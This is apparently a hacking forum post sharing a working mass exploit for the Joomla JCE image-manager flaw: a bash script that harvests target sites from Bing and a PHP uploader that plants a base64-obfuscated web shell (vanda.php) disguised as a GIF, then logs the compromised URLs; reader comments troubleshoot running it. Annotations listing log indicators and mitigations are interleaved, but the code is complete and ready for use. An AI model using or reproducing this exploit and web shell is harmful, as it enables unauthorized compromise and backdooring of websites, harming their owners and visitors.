D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
insert jce.php beside bash script :
#!/bin/bash
# Jce Server Scanner && Exploiter
# Coded By : Red V!per
# http://redhat-viper.blogspot.com
# Report Bugs : RedH4t.Viper@yahoo.com
# D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
# Gr33tz : All Turkish && Persian Hacker
#--------------------------------------------------------------------------------------------------------------------
#
# Tnx 2 : IrIsT.Ir && turk-bh.ir && ibh.ir && 3xp1r3.com && madleets.com
# devil-zone.net && kurdhackteam.com && www.turkhackteam.net && thecrowscrew.org
#
#-------------------- Red V!per Banner ----------------------------------------------------------------------------
# Banner: clears the terminal, prints the coloured ASCII-art banner and the tool
# title, then prompts the operator for one target address.
# Side effect: the answer is stored in the global variable IP. Nothing here checks
# its format; it is interpolated as typed into the search URL built in
# scan_jce_on_victim.
# Relies on the globals B (bold) and N (reset) being set before it is called.
Banner()
{
clear
# Each line: blue frame via '\E[34m', red or green art inside, then `tput sgr0` to reset attributes.
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" || || "; tput sgr0
echo -e '\E[34m'" ||\E[31m _____ _ __ ___ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | __ \ | | \ \ / / | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | |__) |___ __| | \ \ / /| |_ __ ___ _ __ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | _ // _ \/ _\ | \ \/ / | | '_ \ / _ \ '__| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \ \ __/ (_| | \ / |_| |_) | __/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_| \_\___|\__,_| \/ (_) .__/ \___|_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m (_) \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _ ___ ___ ___ ___ __ _ _ __ _ __ ___ _ __ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | | (_| __/ \__ \ (_| (_| | | | | | | | __/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_| \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _/ | \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m|__/ \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
sleep 3
echo
# $B switches the terminal to bold for the title block and the prompt below.
echo -e "$B /\ (^_^) /\ [public] \n"
echo -e " -===============================================-\n"
echo -e " Server Jce Scanner && Exploiter"
echo
echo -e " BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [ INFO ] ===========-"
echo
# Single interactive input of the whole tool; the value is kept in the global IP.
read -p "[*] Target Ip : " IP
# $N resets the bold attribute turned on above.
echo -e "$N"
}
#-------------------- Variables ----------------------------------------------------------------------------
# ANSI SGR escape strings; they take effect only when printed through `echo -e`.
B='\033[1m'    # bold on
N='\033[0m'    # reset all attributes
L='\033[5m'    # blink (not referenced elsewhere in the visible script)
C='\033[m'     # reset, parameterless form (not referenced elsewhere in the visible script)
#-------------------- Scanning Jce Targets on Server -------------------------------------------------------
# scan_jce_on_victim: two-phase routine driven by the global IP.
#   Phase 1 - pages through Bing results for `ip:$IP 'index.php?option=com_'` and
#             collects the result links into a de-duplicated host list.
#   Phase 2 - for every host, requests the JCE image-manager endpoint; when the
#             response status contains "OK" it hands the host to jce.php and then
#             fetches /images/stories/vanda.php to see whether the marker
#             "GIF89a1" is served back.
# Files written in the working directory: domain_bing.php, alldomain_bing.txt,
# domains.txt, site.lst, shells.lst (all removed again) and vanda_shells.lst,
# which is kept and accumulates the confirmed URLs.
#
# Defender notes, all taken from the requests visible below:
#   - Access-log pattern per host: a request for
#     index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
#     followed shortly by a request for /images/stories/vanda.php.
#   - Any *.php file under images/stories/ is worth investigating; denying script
#     execution in upload/image directories and keeping the JCE component updated
#     removes the condition this routine probes for.
scan_jce_on_victim()
{
page=0
how_many=1
single_page=
last_page_check=
# Relative URL of the JCE image-manager plugin used as the presence probe.
image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"
# Keep paging until the result counter shows the last page ("N-M of M"),
# no counter is found at all, or the counter reports a single-digit result count.
while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
# first=${page}1 yields 01, 11, 21, ... i.e. the offset of each results page.
url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"
# The search request carries a fixed, dated Firefox 3.0b5 User-Agent string.
wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"
# The three greps below scrape the sb_count span of the saved results page.
last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `
# Extract the href of every result heading and append it to the running list.
cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
rm -f domain_bing.php
let page=$page+1
done
# Normalise: keep com_ URLs, lower-case, strip scheme, "www.", query string and
# "/index.php", then sort and de-duplicate into domains.txt.
cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt
for domain in `cat domains.txt`
do
# GET is presumably the lwp-request alias from libwww-perl (-s prints the status
# line, -d suppresses the body) - confirm on the host where the tool was found.
GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?
if [ $check -eq 0 ]
then
# site.lst is overwritten with this one host; jce.php reads it (argv[1]) and
# writes its own results to shells.lst (argv[2]).
echo "www.$domain" > site.lst
php jce.php site.lst shells.lst
# Success test: the fixed path must answer with the "GIF89a1" marker.
GET -s "http://www.$domain/images/stories/vanda.php" | grep "GIF89a1" >> /dev/null;check2=$?
if [ $check2 -eq 0 ]
then
echo -e "$B[+] www.$domain \e[1;32m[Trying to upload shell] \e[0m"
echo -e "$B[+] Shell : www.$domain/images/stories/vanda.php \e[1;31m[OK] \e[0m"
# vanda_shells.lst is the only file not deleted at the end of the run.
echo "www.$domain/images/stories/vanda.php" >> vanda_shells.lst
else
echo "[-] www.$domain/ [No] "
fi
else
echo "[-] www.$domain/ [No] "
fi
done
# Scratch files are removed; vanda_shells.lst is left behind.
rm -rf alldomain_bing.txt
rm -rf domains.txt
rm -rf site.lst
rm -rf shells.lst
}
#-------------------- Remove ------------------------------------------------------------------------
# all_remove: wipe scratch files left in the current directory by an earlier run.
# The globs are broad (e.g. site*, domains*), so any unrelated file in the working
# directory whose name starts with one of these prefixes is deleted as well.
# jce_server* and domains_f* are not created anywhere in the visible script.
# vanda_shells.lst and shells.lst match none of the patterns and survive.
all_remove()
{
    # Search-scrape leftovers and host lists.
    rm -rf alldomain_bing* domains_f* domain_bing* domains* jce_server*
    # Kept as the final command so the function's exit status is unchanged.
    rm -rf site*
}
#-------------------- Main Brain :D ------------------------------------------------------------------------
# main: entry point. Marks jce.php executable, makes sure shells.lst exists,
# shows the banner (which reads the target into IP), clears scratch files from
# earlier runs and starts the scan.
# jce.php must sit in the current working directory; it is later run as
# `php jce.php site.lst shells.lst` from scan_jce_on_victim.
# Forensic note: a directory holding this script, jce.php and vanda_shells.lst
# indicates the tool was run from that location.
main()
{
chmod +x jce.php
# Create an empty shells.lst if absent (all_remove does not delete it).
if [ ! -f shells.lst ]; then
touch shells.lst ;
fi
Banner;
all_remove;
scan_jce_on_victim;
}
main;
jce.php :
<?phpDownload Bash Script :http://www.mediafire.com/view/2rk5ikxu1k1kon3/jce-scanner-exploiter.sh
/*
# Mass Uploader
# Coded By Mua & Keresteci
# Recoded By Red V!per
*/
// Run counters: $kirilmis counts hosts where the marker file was confirmed,
// $taranmis counts hosts processed.
$kirilmis = 0;
$taranmis = 0;
// All PHP errors and notices are suppressed for the whole run.
error_reporting(0);
// No execution time limit; default socket timeout of 3 seconds.
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 3);
/**
 * Fetch a URL with a hand-written HTTP/1.0 GET over a plain TCP socket.
 *
 * The URL is split with parse_url(); only its "path" and "host" parts are used,
 * so any query string is dropped and the port is always 80 (no TLS).
 *
 * @param string $link Absolute http:// URL.
 * @return string Raw response as read from the socket (status line, headers and
 *                body); empty/null when the connection could not be opened.
 */
function oku($link)
{
$site = parse_url($link);
$link = $site["path"];
$site = $site["host"];
$httpresponse = "";
// 30-second connect timeout.
$fp = fsockopen($site, 80, $err_num, $err_msg, 30);
if ($fp) {
fputs($fp, "GET $link HTTP/1.0\r\nHost: $site\r\n\r\n");
fputs($fp, "Connection: close\n\n");
// Read the reply in chunks of at most 127 bytes until the peer closes.
while (!feof($fp)) {
$http_response .= fgets($fp, 128);
}
fclose($fp);
}
return $http_response;
}
// Main run. argv[1] = file with one host or URL per line, argv[2] = output file
// that receives the URL of every host where the marker file was confirmed.
//
// For each host the loop opens three short-lived TCP connections to port 80 and
// then does a verification fetch:
//   1. a raw, non-HTTP probe string;
//   2. a multipart POST to the JCE image-manager endpoint that uploads "mua.gif";
//   3. a JSON "folderRename" call that renames /mua.gif to vanda.php;
//   4. a GET of /images/stories/vanda.php, checked for the "GIF89a1" marker.
//
// Indicators a defender can search for, all literal values from this file:
//   - User-Agent "BOT/0.1 (BOT for JCE)" and User-Agent "Mua ";
//   - multipart boundary ---------------------------41184676334;
//   - the fixed cookie/token pair 6bc427c8a7981f4fe1f5ac65c1246b5f=...;
//   - the raw string "Mua-Kontrol-Paketi-Panpa" arriving on port 80;
//   - files mua.gif or vanda.php under images/stories/, and any image upload whose
//     content starts with GIF89a but contains "<?php";
//   - image-manager requests with fn=folderRename whose new name ends in .php.
// Mitigation: run a JCE release that validates the target extension on rename,
// and configure the web server so nothing under images/ is executed as PHP.
$dosya = $argv[1];
$kirilanlar = fopen($argv[2], 'w');
$okunan = file($dosya);
$toplam = count($okunan);
foreach ($okunan as $sira => $satir) {
$hatalisite = 0;
// Strip line endings, then accept either a full URL or a bare host name.
$satir = preg_replace("/[\\n\\r]+/", "", $satir);
$url = parse_url($satir);
if ($url["scheme"])
$host = $url["host"];
else {
$url = parse_url("http://" . $satir);
$host = $url["host"];
}
// Step 1: a bare string, not an HTTP request, is written to port 80 and the
// socket is closed without reading. Servers will likely log it as a malformed
// request, which makes the string a usable log signature.
$packet = "Mua-Kontrol-Paketi-Panpa";
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
// Upload body: a GIF magic header followed by PHP. The base64 blob decodes to a
// small HTML file-upload form that copies a posted file into its own directory
// when the POST field _upl equals "Upload".
$content = "GIF89a1\n";
$content .= '<?php eval("?>".base64_decode("PGh0bWw+IENvZGVkIEJ5IE11YSAmIEtlcmVzdGVjaTxicj4NCjw/IA0KLyogQ29kZWQgQnkgTXVhICYgS2VyZXN0ZWNpICovDQplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOw0KZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+dXN0YSB1cGxvYWQgYmFzYXJpbGk8L2I+PGJyPjxicj4nOyB9DQp9DQo/PjwvaHRtbD4=")); ?>';
// Multipart form body with a fixed boundary: upload-dir "/", an empty Filedata
// part, upload-overwrite 0, the payload as "mua.gif" declared image/gif, and
// action "upload".
$data = "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
$data .= "/\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
$data .= "0\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"mua.gif\"\r\n";
$data .= "Content-Type: image/gif\r\n\r\n";
$data .= "$content\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "0day\r\n";
$data .= "-----------------------------41184676334\r\n";
$data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
$data .= "upload\r\n";
$data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
// Step 2: upload request. Request line, User-Agent and Cookie are constant
// across every target, so they match as exact strings in access logs or WAF rules.
$packet = "POST " . $p . "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
$packet .= "Accept-Language: en-us,en;q=0.5\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Proxy-Connection: close\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n\r\n\r\n\r\n";
$packet .= $data;
// The request is written and the socket closed; the server's reply is never read.
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
// Step 3: rename request. The JSON body asks the image manager's folderRename
// function to rename /mua.gif to vanda.php; a rename whose new name carries a
// script extension is the event to alert on.
$packet = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "User-Agent: Mua \r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-US,en;q=0.8\r\n";
$packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
$packet .= "Accept-Encoding: deflate\n";
$packet .= "X-Request: JSON\r\n";
$packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
$ren = "json={\"fn\":\"folderRename\",\"args\":[\"/mua.gif\",\"vanda.php\"]}";
$packet .= "Content-Length: " . strlen($ren) . "\r\n\r\n";
$packet .= $ren . "\r\n\r\n";
$fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);
if ($fp) {
fwrite($fp, $packet);
fclose($fp);
}
$taranmis = $taranmis + 1;
// Step 4: verification. The fixed path is fetched with oku() and the raw
// response is searched for the "GIF89a1" marker; confirmed URLs go to the
// output file.
$kod = oku("http://" . $host . "/images/stories/vanda.php");
$pozisyon = strpos($kod, "GIF89a1");
if ($pozisyon == true) {
$kirilmis = $kirilmis + 1;
fwrite($kirilanlar, "http://" . $host . "/images/stories/vanda.php\r\n");
}
} //for each
fclose($yaz);
fclose($kirilanlar);
Download jce.php : http://www.mediafire.com/view/p8210ab5d0duj9y/jce.php
Hi, i try to use you`r scanner but, i get an error, i get the permision to file +x and 777 and still i get the error.
-sh-3.2$ ./jce-scanner-exploiter.sh
-sh: ./jce-scanner-exploiter.sh: /bin/bash^M: bad interpreter: No such file or directory
can u post here what i need to do?
Thanks
PS: the root have php at last version
bash: ./jce-scanner-exploiter.sh: Permission denied
how to overcome?
Hi SK . if u have dos2unix software on your pc run this command
dos2unix script.sh
if u have not dis software please install it buy this command
sudo apt-get install dos2unix
and Dear Riypto rypto please run script with root acces or run script with sudo
sudo script.sh
then give your root password
why after entering the ip is not running ?
salam dadash error mide
http://up.vbiran.ir/uploads/aaa_35661138885548143234.png
must .
chmod 777 jce-scanner-exploiter.sh :))
update The Bing Url In The Script Because Bing Has Made Changes
salam >>after entering IP not worke ???? ):